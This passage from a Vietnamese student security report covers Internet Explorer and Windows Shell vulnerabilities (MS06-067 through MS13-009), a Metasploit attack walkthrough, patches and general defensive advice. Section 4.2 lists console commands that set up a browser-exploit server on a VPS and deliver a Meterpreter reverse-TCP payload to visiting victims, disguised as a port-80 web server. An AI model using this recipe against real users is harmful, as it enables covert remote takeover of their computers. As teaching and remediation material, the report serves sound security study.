4.1 Các lỗi bảo mật:
a) Lỗi bảo mật Ms06-067:
Mô tả:
– Là lỗi làm cho IE bị tràn bộ đệm, để có thể dựa vào đó mà tấn công và thực hiện mã lệnh từ xa.
Hệ điều hành bị ảnh hưởng: – Windows XP Universal – Windows 2000 Universal
– Windows Server 2003 Universal
b) Lỗi bảo mật Ms10-046:
Mô tả:
– Một lỗ hổng được công bố công khai trong Windows Shell. Các lỗ hổng có thể cho phép thực thi mã từ xa nếu biểu tượng của một phím tắt thiết kế đặc biệt được hiển thị. Một kẻ tấn công khai thác thành công lỗ hổng này có thể đạt được các quyền người dùng tương tự như người dùng địa phương. Người dùng có tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ thống có thể được ít ảnh hưởng hơn so với những người dùng hoạt động với người sử dụng quyền hành chính.
Phần mềm bị ảnh hưởng:
– Windows XP Service Pack 3
– Windows XP Professional x64 Edition Service Pack 2 – Windows Server 2003 Service Pack 2
– Windows Server 2003 x64 Edition Service Pack 2
– Windows Server 2003 with SP2 for Itanium-based Systems – Windows Vista Service Pack 1 and Windows Vista Service Pack 2
System Hacking Athena Center
SVTH: Huỳnh Dương Khang Trang 43
– Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
– Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2
– Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2
– Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2
– Windows 7 for 32-bit Systems – Windows 7 for x64-based Systems
– Windows Server 2008 R2 for x64-based Systems – Windows Server 2008 R2 for Itanium-based System
c) Lỗi bảo mật Ms11-003:
Mô tả:
– Là lỗi dựa trên CSS của IE, khai thác vào lỗ hỏng của HTML. Khi nó phân tích một trang HTML có chứa hàm đệ quy, hàm này sẽ bị xóa nhưng sau đó được sử dụng lại. Phần mềm bị ảnh hưởng: – Internet Explorer 6 – Internet Explorer 7 – Internet Explorer 8 d) Lỗi bảo mật Ms12-063: Mô tả:
– Khi tải một trang web bình thường sẽ có một Object với một hàm get gọi là Object IMSHTCP. Nhưng nếu có sự can thiệp, khi load trang thì bất ngờ Object này bị xóa đi và sau đó được sử dụng lại, từ đó Hacker có thể thâm nhập vào
Phần mềm bị ảnh hưởng:
– Internet Explorer 7 trên Windown XP SP3 – Internet Explorer 8 trên Windown XP SP3 – Internet Explorer 7 trên Windown Vista
SVTH: Huỳnh Dương Khang Trang 44 – Internet Explorer 8 trên Windown XP SP3
– Internet Explorer 8 trên Windown 7 – Internet Explorer 9 trên Windown 7
e) Lỗi bảo mật Ms13-009:
Phần mềm bị ảnh hưởng:
– Internet Explorer 8 trên Windown XP SP3
4.2 Cách tấn công:
Tại cửa sổ Metasploit console, ta sử dụng các lệnh sau để tạo một server lắng nghe các sự truy cập từ bên ngoài
> search Msxy_abc
(Với xy_abc là một trong các lỗi cần khai thác, Ms06_067, Ms10_046, Ms11_003, Ms12_063, Ms13_009)
> use exploit/windows/browser/mã_lỗi_khai_thác Với các mã lỗi khai thác:
Ms06_067: ms06_067_keyframe Ms10_046: ms10_046_shortcut_icon_dllloader Ms11_003: ms11_003_ie_xss_import Ms12_063: ie_execommane_uaf Ms13_009: ms13_009_slayoutrun_uaf > show options
(Xem thông tin thiết đặt) > set srvhost 14.0.21.184
(VPS được đăng ký với địa chỉ IP 14.0.21.184) > set lhost 14.0.21.184
> set uripath test
(Đường dẫn kèm theo IP, nếu không set, metasploit sẽ chọn ngẫu nhiên đường dẫn bất kỳ)
System Hacking Athena Center
SVTH: Huỳnh Dương Khang Trang 45
(Chọn port 80, VPS như một Web Server, tránh sự nghi ngờ của người dùng)
> set payload windows/meterpreter/reverse_tcp (Cách tấn công vào trong hệ thống)
> exploit
Công việc tiếp theo là chờ cho máy mục tiêu truy cập vào địa chỉ: http://14.0.21.184/test. Ngay lúc đó, server trên VPS chúng ta sẽ tiến hành gửi trojan về máy mục tiêu. Bây giờ ta có thể tiến hành khai thác tại máy mục tiêu
4.3 Phương pháp khắc phục lỗ hổng
Ms06-067: Cập nhập hệ điều hành lên phiên bản Service Pack 2
Ms10-046: tải gói KB286198 để vài đặt vào trong hệ thống hoặc cập nhật hệ điều hành lên phiên bản hệ điều hành mới hơn
Ms11-003: Cập nhập hệ điều hành lên phiên bản mới nhất
Ms12-063: tải gói vá lỗi KB2744842 để cài đặt vào trong hệ thống Ms13-009: tải gói vá lỗi KB2792100 để cài đặt vào trong hệ thống
SVTH: Huỳnh Dương Khang Trang 46
PHẦN 3: TỔNG KẾT
Với những kiểu tấn công hệ thống dựa trên những lỗi sai sót trong quá trình sử dụng máy tính hoặc các lỗi về bảo mật vật lý, có một số phương pháp nhằm giảm thiểu và phòng tránh việc Hacker đánh cắp Mật khẩu như sau:
– Mật khẩu phải được đặt nhiều hơn 8 ký tự và phải là tổng hợp giữa chữ hoa, chữ thường, số và ký tự đặc biệt để các chương trình khó dò ra.
– Cấu hình trong registry cho mật khẩu trong hệ thống windows chỉ được băm và lưu dưới dạng NTLM để các chương trình khó khăn để dò tìm
– Người dùng admin nên xóa tập tin sam trong thư mục Windows/repair sau mỗi lần backup dữ liệu bằng rdisk.
Trong quá trình sử dụng máy tính để truy cập Internet, cần lưu ý:
– Không mở tập tin đính kèm thư điện tử có nguồn gốc không rõ ràng hoặc không tin cậy.
– Chắc chắn rằng bạn có và đã bật hệ thống tường lửa cho hệ thống của mình.
– Đảm bảo Windows của bạn được cập nhật thường xuyên, phần mềm bảo mật của bạn có chức năng cập nhật "live" (tự động cập nhật trực tuyến).
– Cài đặt phần mềm diệt virut Internet Security.
– Luôn sử dụng các bản Office có bản quyền để luôn được cập nhật vá lỗi và hỗ trợ kỹ thuật từ nhà cung cấp.
Microsoft đã xây dựng một loạt các công cụ trong Windows để các nhà quản trị cũng như người dùng có kinh nghiệm có thể phân tích chiếc máy tính của mình xem liệu nó có đang bị xâm phạm hay không. Một khi nghi ngờ máy tính của mình bị xâm nhập, người dùng có thể sử dụng các công cụ này để tự kiểm tra máy tính của mình khi có những biểu hiện đáng ngờ: WMIC, Lệnh net, Openfiles, Netstat, Find.
System Hacking Athena Center
SVTH: Huỳnh Dương Khang Trang 47
DANH MỤC TÀI LIỆU THAM KHẢO
Nguyễn Sơn Khê, Đỗ Tấn Phát, Nguyễn Cao Thắng, Athena – Sử dụng BackTrack 5 khai thác lỗ hổng mạng. http://www.hackyshacky.com/2013/03/how-to-hack-facebook-with- backtrack-5.html https://www.youtube.com/watch?v=g1Xo7K2osxE&list=PL6Elfw63yI9RVQ LXsK_V7XyHmiJc_9v56 http://nvkhoiit.blogspot.com/ http://www.slideshare.net/Anhphailamthenao/bo-co-thc-tp-system- hacking?related=5
